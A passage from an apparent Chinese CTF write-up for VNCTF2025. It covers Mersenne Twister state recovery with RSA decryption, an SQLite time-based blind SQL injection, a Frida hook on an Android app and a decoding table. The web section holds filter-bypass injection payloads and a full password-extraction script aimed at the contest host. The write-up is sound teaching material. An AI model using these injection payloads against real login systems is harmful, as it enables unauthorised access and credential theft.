class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)])<br>        <span class="hljs-keyword">yield</span> row<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">buildBox</span>():<br>    b = matrix(GF(<span class="hljs-number">2</span>),length,length)<br>    rg = getRow()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(length)):<br>        b[i] = <span class="hljs-built_in">next</span>(rg)<br>    <span class="hljs-keyword">return</span> b<br><br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br>    b = buildBox()<br>    f = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;Matrix_large&quot;</span>,<span class="hljs-string">&quot;w&quot;</span>)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(b.nrows())):<br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(b.ncols()):<br>            f.write(<span class="hljs-built_in">str</span>(b[i,j])+<span class="hljs-string">&quot;n&quot;</span>)<br>    f.close()<br><br>test()<br></code></pre></td></tr></table></figure></li>
<li>爆破最后退化的数字并验证（一开始代码写错了，得到了结果但是没退出循环，硬跑了一个半小时） <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br><span class="line">119</span><br><span class="line">120</span><br><span class="line">121</span><br><span class="line">122</span><br><span class="line">123</span><br><span class="line">124</span><br><span class="line">125</span><br><span class="line">126</span><br><span class="line">127</span><br><span class="line">128</span><br><span class="line">129</span><br><span class="line">130</span><br><span class="line">131</span><br><span class="line">132</span><br><span class="line">133</span><br><span class="line">134</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">from</span> tqdm <span class="hljs-keyword">import</span> tqdm<br><span class="hljs-keyword">from</span> sage.<span class="hljs-built_in">all</span> <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> Crypto.Util.number <span class="hljs-keyword">import</span> *<br><span class="hljs-keyword">from</span> sympy <span class="hljs-keyword">import</span> nextprime<br><span class="hljs-keyword">import</span> random<br><span class="hljs-keyword">from</span> tqdm <span class="hljs-keyword">import</span> tqdm<br><span class="hljs-keyword">from</span> gmpy2 <span class="hljs-keyword">import</span> invert<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">buildMatrix</span>():<br>    length = <span class="hljs-number">19968</span><br>    cnt = <span class="hljs-number">0</span><br>    m = matrix(GF(<span class="hljs-number">2</span>), length, length)<br>    lis = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;Matrix_large&quot;</span>, <span class="hljs-string">&quot;r&quot;</span>).read().split(<span class="hljs-string">&quot;n&quot;</span>)<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(lis)-<span class="hljs-number">1</span>)):<br>        row = cnt // <span class="hljs-number">19968</span><br>        col = cnt % <span class="hljs-number">19968</span><br>        m[row, col] = lis[i]<br>        cnt += <span class="hljs-number">1</span><br>    <span class="hljs-keyword">return</span> m<br><br>m = buildMatrix()<br><br><span class="hljs-comment"># X = Z*(T^-1)</span><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">recoverState</span>(<span class="hljs-params">leak</span>):<br>    <span class="hljs-keyword">try</span>:<br>        x = m.solve_left(leak)<br>    <span class="hljs-keyword">except</span>:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>    x = <span class="hljs-string">&#x27;&#x27;</span>.join([<span class="hljs-built_in">str</span>(i) <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> x])<br>    state = []<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">624</span>):<br>        tmp = <span class="hljs-built_in">int</span>(x[i * <span class="hljs-number">32</span>:(i + <span class="hljs-number">1</span>) * <span class="hljs-number">32</span>], <span class="hljs-number">2</span>)<br>        state.append(tmp)<br>    <span class="hljs-keyword">return</span> state<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">backfirst</span>(<span class="hljs-params">state</span>):<br>    high = <span class="hljs-number">0x80000000</span><br>    low = <span class="hljs-number">0x7fffffff</span><br>    mask = <span class="hljs-number">0x9908b0df</span><br>    tmp = state[<span class="hljs-number">623</span>] ^ state[<span class="hljs-number">396</span>]<br>    <span class="hljs-keyword">if</span> tmp &amp; high == high:<br>        tmp ^= mask<br>        tmp &lt;&lt;= <span class="hljs-number">1</span><br>        tmp |= <span class="hljs-number">1</span><br>    <span class="hljs-keyword">else</span>:<br>        tmp &lt;&lt;= <span class="hljs-number">1</span><br>    <span class="hljs-keyword">return</span> (<span class="hljs-number">1</span> &lt;&lt; <span class="hljs-number">32</span> - <span class="hljs-number">1</span>) | tmp &amp; low, tmp &amp; low<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">pwn</span>(<span class="hljs-params">leak</span>):<br>    state = recoverState(leak)<br>    <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> state:<br>        <span class="hljs-keyword">return</span> <span class="hljs-literal">None</span><br>    L = [leak[i] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>)]<br>    prng = random.Random()<br>    guess1, guess2 = backfirst(state)<br>    <span class="hljs-built_in">print</span>(guess1, guess2)<br>    state[<span class="hljs-number">0</span>] = guess1<br>    s = state<br>    prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>    g1 = [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [prng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)]<br>    <span class="hljs-keyword">if</span> g1 == L:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;first&quot;</span>)<br>        prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>        <span class="hljs-keyword">return</span> prng<br><br>    state[<span class="hljs-number">0</span>] = guess2<br>    s = state<br>    prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>    g2 = [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [prng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)]<br>    <span class="hljs-keyword">if</span> g2 == L:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;second&quot;</span>)<br>        prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>        <span class="hljs-keyword">return</span> prng<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">test</span>():<br>    length = <span class="hljs-number">19968</span><br>    prng = random.Random()<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">37440</span>):<br>        prng.getrandbits(<span class="hljs-number">8</span>)<br>    originState = prng.getstate()<br>    leak = vector(GF(<span class="hljs-number">2</span>), [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [prng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(length//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)])<br>    <span class="hljs-comment"># 恢复state</span><br>    state = recoverState(leak)<br>    prng.setstate(originState)<br>    prng.getrandbits(<span class="hljs-number">8</span>)<br>    originState = [x <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> prng.getstate()[<span class="hljs-number">1</span>][:-<span class="hljs-number">1</span>]]<br>    <span class="hljs-keyword">assert</span> originState[<span class="hljs-number">1</span>:] == state[<span class="hljs-number">1</span>:]<br>    L = [leak[i] <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>)]<br>    <span class="hljs-comment"># 两种可能</span><br>    guess1, guess2 = backfirst(state)<br>    <span class="hljs-built_in">print</span>(guess1, guess2)<br>    state[<span class="hljs-number">0</span>] = guess1<br>    s = state<br>    prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>    g1 = [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [prng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)]<br>    <span class="hljs-keyword">if</span> g1 == L:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;first&quot;</span>)<br>    state[<span class="hljs-number">0</span>] = guess2<br>    s = state<br>    prng.setstate((<span class="hljs-number">3</span>, <span class="hljs-built_in">tuple</span>(s + [<span class="hljs-number">0</span>]), <span class="hljs-literal">None</span>))<br>    g2 = [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> [prng.getrandbits(<span class="hljs-number">8</span>) <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">120</span>//<span class="hljs-number">8</span>)] <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)]<br>    <span class="hljs-keyword">if</span> g2 == L:<br>        <span class="hljs-built_in">print</span>(<span class="hljs-string">&quot;second&quot;</span>)<br><br><span class="hljs-keyword">def</span> <span class="hljs-title function_">main</span>():<br>    f = <span class="hljs-built_in">open</span>(<span class="hljs-string">&quot;data_RC4.txt&quot;</span>,<span class="hljs-string">&quot;r&quot;</span>).read()<br>    lis = <span class="hljs-built_in">eval</span>(f)<br><br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> tqdm(<span class="hljs-built_in">range</span>(<span class="hljs-number">256</span>)):<br>        randcrack = [i^<span class="hljs-number">17</span>^lis[j] <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">37440</span>,<span class="hljs-number">37440</span>+<span class="hljs-number">2496</span>)]<br>        leak = vector(GF(<span class="hljs-number">2</span>), [<span class="hljs-built_in">int</span>(x) <span class="hljs-keyword">for</span> z <span class="hljs-keyword">in</span> randcrack <span class="hljs-keyword">for</span> x <span class="hljs-keyword">in</span> <span class="hljs-built_in">bin</span>(z)[<span class="hljs-number">2</span>:].zfill(<span class="hljs-number">8</span>)])<br>        prng = pwn(leak)<br>        <span class="hljs-keyword">if</span> <span class="hljs-keyword">not</span> prng:<br>            <span class="hljs-keyword">continue</span><br>        <span class="hljs-keyword">for</span> j <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-number">37440</span>,<span class="hljs-number">40000</span>):<br>            <span class="hljs-keyword">if</span> prng.getrandbits(<span class="hljs-number">8</span>)!=i^<span class="hljs-number">17</span>^lis[j]:<br>                <span class="hljs-built_in">print</span>(j)<br>                <span class="hljs-keyword">break</span><br>        <span class="hljs-keyword">else</span>:<br>            <span class="hljs-built_in">print</span>(<span class="hljs-string">f&quot;crack!i=<span class="hljs-subst">&#123;i&#125;</span>&quot;</span>)<br>            p = nextprime(prng.getrandbits(<span class="hljs-number">512</span>))<br>            n = <span class="hljs-number">26980604887403283496573518645101009757918606698853458260144784342978772393393467159696674710328131884261355662514745622491261092465745269577290758714239679409012557118030398147480332081042210408218887341210447413254761345186067802391751122935097887010056608819272453816990951833451399957608884115252497940851</span><br>            e = <span class="hljs-number">65537</span><br>            encrypted_flag = <span class="hljs-number">22847144372366781807296364754215583869872051137564987029409815879189317730469949628642001732153066224531749269434313483657465708558426141747771243442436639562785183869683190497179323158809757566582076031163900773712582568942616829434508926165117919744857175079480357695183964845638413639130567108300906156467</span><br>            <span class="hljs-keyword">assert</span> n%p==<span class="hljs-number">0</span><br>            q = n//p<br>            phi = (p-<span class="hljs-number">1</span>)*(q-<span class="hljs-number">1</span>)<br>            d = invert(e,phi)<br>            m = <span class="hljs-built_in">pow</span>(encrypted_flag,d,n)<br>            <span class="hljs-built_in">print</span>(long_to_bytes(m))<br>            <span class="hljs-keyword">break</span><br><br><span class="hljs-comment"># test()</span><br>main()<br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_7.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>总共跑了三个小时才拿到结果😅 <img src="/img/VNCTF2025/VNCTF2025_8.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h1 id="web"><strong>Web</strong></h1>
<p>一天的时间太紧张，都没怎么看其他web题。</p>
<h2 id="奶龙回家">奶龙回家</h2>
<ul>
<li>经典的注入漏洞，打开网站用burpsuit抓包后使用爬虫发包： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs python">data = &#123; <span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">&quot;&quot;</span>, <span class="hljs-string">&#x27;password&#x27;</span>: <span class="hljs-string">&quot;&quot;</span>&#125;<br>headers = &#123; <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;application/json&#x27;</span>&#125;<br>response = requests.post(url, headers=headers, data=json.dumps(data))<br></code></pre></td></tr></table></figure></li>
<li>上来先<code>' or 1=1#</code>起手，首先题目过滤了空格用<code>/**/</code>绕过，发现可以单引号闭合即有注入可能，不能使用<code>sleep</code>等函数；</li>
<li>一开始还是受思维定式影响一直以为是MYSQL的注入，但是使用<code>' or if(1,1,0)--</code>和<code>' or (database() like '%')--</code>数据库会报错，执行<code>' or sqlite_version()--</code>成功才意识到作者使用的是sqlite数据库，在这卡了半天🫠</li>
<li>sqlite注入使用<code>randomblob(300000000)</code>代替<code>sleep(1)</code>，使用<code>case</code>语句进行判断便可执行时间盲注，脚本如下： <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><code class="hljs python"><span class="hljs-keyword">import</span> requests<br><span class="hljs-keyword">import</span> json<br><span class="hljs-keyword">import</span> time<br><br>url = <span class="hljs-string">&quot;http://node.vnteam.cn:47161/login&quot;</span><br>test = <span class="hljs-string">&#x27;0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz!&quot;#$%&amp;\&#x27;()*+,-./:;&lt;=&gt;?@[\\]^_`&#123;|&#125;~&#x27;</span><br><br>username = <span class="hljs-string">&quot;nailong&quot;</span><br>password = <span class="hljs-string">&quot;&quot;</span><br>idx = <span class="hljs-built_in">len</span>(password)+<span class="hljs-number">1</span><br><span class="hljs-keyword">while</span> <span class="hljs-number">1</span>:<br>    <span class="hljs-keyword">for</span> i <span class="hljs-keyword">in</span> <span class="hljs-built_in">range</span>(<span class="hljs-built_in">len</span>(test)):<br>        time1 = time.time()<br>        <span class="hljs-comment"># payload = f&quot;substr((select/**/username/**/from/**/users),&#123;idx&#125;,1)&lt;&#x27;&#123;test[i]&#125;&#x27;&quot;</span><br>        payload = <span class="hljs-string">f&quot;substr((select/**/password/**/from/**/users),<span class="hljs-subst">&#123;idx&#125;</span>,1)&lt;&#x27;<span class="hljs-subst">&#123;test[i]&#125;</span>&#x27;&quot;</span><br>        data = &#123;<br>            <span class="hljs-string">&#x27;username&#x27;</span>: <span class="hljs-string">f&quot;&#x27;/**/or/**/case/**/when/**/<span class="hljs-subst">&#123;payload&#125;</span>/**/then/**/randomblob(300000000)/**/else/**/0/**/end--&quot;</span>,<br>            <span class="hljs-string">&#x27;password&#x27;</span>: <span class="hljs-string">&quot;&#x27;1&quot;</span><br>        &#125;<br>        headers = &#123;<br>            <span class="hljs-string">&#x27;Content-Type&#x27;</span>: <span class="hljs-string">&#x27;application/json&#x27;</span><br>        &#125;<br>        response = requests.post(url, headers=headers, data=json.dumps(data))<br>        time2 = time.time()<br><br>        <span class="hljs-comment"># print(json.loads(response.text))</span><br>        <span class="hljs-comment"># print(i,time2-time1)</span><br>        <span class="hljs-keyword">if</span> json.loads(response.text)[<span class="hljs-string">&#x27;message&#x27;</span>]!=<span class="hljs-string">&#x27;账号或密码错误！！&#x27;</span>:<br>            <span class="hljs-built_in">print</span>(json.loads(response.text))<br>            exit()<br>        <span class="hljs-keyword">if</span> time2-time1&gt;<span class="hljs-number">0.5</span>:<br>            <span class="hljs-keyword">if</span> i!=<span class="hljs-number">0</span>:<br>                password+=test[i-<span class="hljs-number">1</span>]<br>            <span class="hljs-keyword">else</span>:<br>                exit()<br>            <span class="hljs-built_in">print</span>(password)<br>            <span class="hljs-keyword">break</span><br>        time.sleep(<span class="hljs-number">0.4</span>)<br>    <span class="hljs-keyword">else</span>:<br>        <span class="hljs-keyword">break</span><br>    idx+=<span class="hljs-number">1</span><br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_9.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>得到用户名密码后提交得到跳转网页进行访问： <img src="/img/VNCTF2025/VNCTF2025_10.png" srcset="/img/loading.gif" lazyload alt="alt text" /> <img src="/img/VNCTF2025/VNCTF2025_11.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h1 id="pwn"><strong>Pwn</strong></h1>
<div class="note note-danger">
            <p>不会pwn一点！</p>
          </div>
<h1 id="misc"><strong>Misc</strong></h1>
<p>只会一道简单的，其他的都好难😶</p>
<h2 id="vn_lang">VN_Lang</h2>
<ul>
<li>提供了一个将文字转化成特定符号的脚本，一开始还以为是打表，但是代码没提供模板，于是用ida打开程序搜索字符串<code>VNCTF</code>得到flag： <img src="/img/VNCTF2025/VNCTF2025_12.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
</ul>
<h1 id="reverse"><strong>Reverse</strong></h1>
<p>好多apk逆向题目。。。</p>
<h2 id="hook-fish">Hook Fish</h2>
<ul>
<li>使用jadx工具逆向apk文件，审计代码： <img src="/img/VNCTF2025/VNCTF2025_13.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>代码逻辑是获取一段口令并进行加密，再在某个神奇的url地址下载<code>hook_fish.dex</code>并载入其中的加密和检查方法；</li>
<li>使用frida连接并hook出url地址，下载得到文件： <figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-title class_">Java</span>.<span class="hljs-title function_">perform</span>(<span class="hljs-keyword">function</span>(<span class="hljs-params"></span>) &#123;<br>    <span class="hljs-keyword">var</span> <span class="hljs-title class_">MainActivity</span> = <span class="hljs-title class_">Java</span>.<span class="hljs-title function_">use</span>(<span class="hljs-string">&quot;com.example.hihitt.MainActivity&quot;</span>);<br>    <br>    <span class="hljs-title class_">MainActivity</span>.<span class="hljs-property">fish</span>.<span class="hljs-property">implementation</span> = <span class="hljs-keyword">function</span>(<span class="hljs-params">str</span>) &#123;<br>        <span class="hljs-variable language_">console</span>.<span class="hljs-title function_">log</span>(<span class="hljs-string">&quot;[*] url input: &quot;</span> + str);<br>        <span class="hljs-keyword">return</span> <span class="hljs-variable language_">this</span>.<span class="hljs-title function_">fish</span>(str);<br>    &#125;;<br>    <br>&#125;);<br></code></pre></td></tr></table></figure> <img src="/img/VNCTF2025/VNCTF2025_14.png" srcset="/img/loading.gif" lazyload alt="alt text" /></li>
<li>继续反编译<code>hook_fish.dex</code>文件，满足检查条件两次解密得到口令： <img src="/img/VNCTF2025/VNCTF2025_15.png" srcset="/img/loading.gif" lazyload alt="alt text" /> <figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><code class="hljs python">fish_dcode = &#123;<br>    <span class="hljs-string">&quot;iiijj&quot;</span>: <span class="hljs-string">&#x27;a&#x27;</span>, <span class="hljs-string">&quot;jjjii&quot;</span>: <span class="hljs-string">&#x27;b&#x27;</span>, <span class="hljs-string">&quot;jijij&quot;</span>: <span class="hljs-string">&#x27;c&#x27;</span>, <span class="hljs-string">&quot;jjijj&quot;</span>: <span class="hljs-string">&#x27;d&#x27;</span>, <span class="hljs-string">&quot;jjjjj&quot;</span>: <span class="hljs-string">&#x27;e&#x27;</span>, <span class="hljs-string">&quot;ijjjj&quot;</span>: <span class="hljs-string">&#x27;f&#x27;</span>, <span class="hljs-string">&quot;jjjji&quot;</span>: <span class="hljs-string">&#x27;g&#x27;</span>,<br>    <span class="hljs-string">&quot;iijii&quot;</span>: <span class="hljs-string">&#x27;h&#x27;</span>, <span class="hljs-string">&quot;ijiji&quot;</span>: <span class="hljs-string">&#x27;i&#x27;</span>, <span class="hljs-string">&quot;iiiji&quot;</span>: <span class="hljs-string">&#x27;j&#x27;</span>, <span class="hljs-string">&quot;jjjij&quot;</span>: <span class="hljs-string">&#x27;k&#x27;</span>, <span class="hljs-string">&quot;jijji&quot;</span>: <span class="hljs-string">&#x27;l&#x27;</span>, <span class="hljs-string">&quot;ijiij&quot;</span>: <span class="hljs-string">&#x27;m&#x27;</span>, <span class="hljs-string">&quot;iijji&quot;</span>: <span class="hljs-string">&#x27;n&#x27;</span>,<br>    <span class="hljs-string">&quot;ijjij&quot;</span>: <span class="hljs-string">&#x27;o&#x27;</span>, <span class="hljs-string">&quot;jiiji&quot;</span>: <span class="hljs-string">&#x27;p&#x27;</span>, <span class="hljs-string">&quot;ijijj&quot;</span>: <span class="hljs-string">&#x27;q&#x27;</span>, <span class="hljs-string">&quot;jijii&quot;</span>: <span class="hljs-string">&#x27;r&#x27;</span>, <span class="hljs-string">&quot;iiiii&quot;</span>: <span class="hljs-string">&#x27;s&#x27;</span>, <span class="hljs-string">&quot;jjiij&quot;</span>: <span class="hljs-string">&#x27;t&#x27;</span>, <span class="hljs-string">&quot;ijjji&quot;</span>: <span class="hljs-string">&#x27;u&#x27;</span>,<br>    <span class="hljs-string">&quot;jiiij&quot;</span>: <span class="hljs-string">&#x27;v&#x27;</span>, <span class="hljs-string">&quot;iiiij&quot;</span>: <span class="hljs-string">&#x27;w&#x27;</span>, <span class="hljs-string">&quot;iijij&quot;</span>: <span class="hljs-string">&#x27;x&#x27;</span>, <span class="hljs-string">&quot;jjiji&quot;</span>: <span class="hljs-string">&#x27;y&#x27;</span>, <span class="hljs-string">&quot;jijjj&quot;</span>: <span class="hljs-string">&#x27;z&#x27;</span>, <span class="hljs-string">&quot;iijjl&quot;</span>: <span class="hljs-string">&#x27;1&#x27;</span>, <span class="hljs-string">&quot;iiilj&quot;</span>: <span class="hljs-string">&#x27;2&#x27;</span>,<br>    <span class="hljs-string">&quot;iliii&quot;</span>: <span class="hljs-string">&#x27;3&#x27;</span>, <span class="hljs-string">&quot;jiili&quot;</span>: <span class="hljs-string">&#x27;4&#x27;</span>, <span class="hljs-string">&quot;jilji&quot;</span>: <span class="hljs-string">&#x27;5&#x27;</span>, <span class="hljs-string">&quot;iliji&quot;</span>: <span class="hljs-string">&#x27;6&#x27;</span>, <span class="hljs-string">&quot;jjjlj&quot;</span>: <span class="hljs-string">&#x27;7&#x27;</span>, <span class="hljs-string">&quot;ijljj&quot;</span>: <span class="hljs-string">&#x27;8&#x27;</span>, <span class="hljs-string">&quot;iljji&quot;</span>: <span class="hljs-string">&#x27;9&#x27;</span>,<br>    <span class="hljs-string">&quot;jjjli&quot;</span>: <span class="hljs-string">&#x27;0&#x27;</span><br>&#125;<br><br>encrypted_str = <span 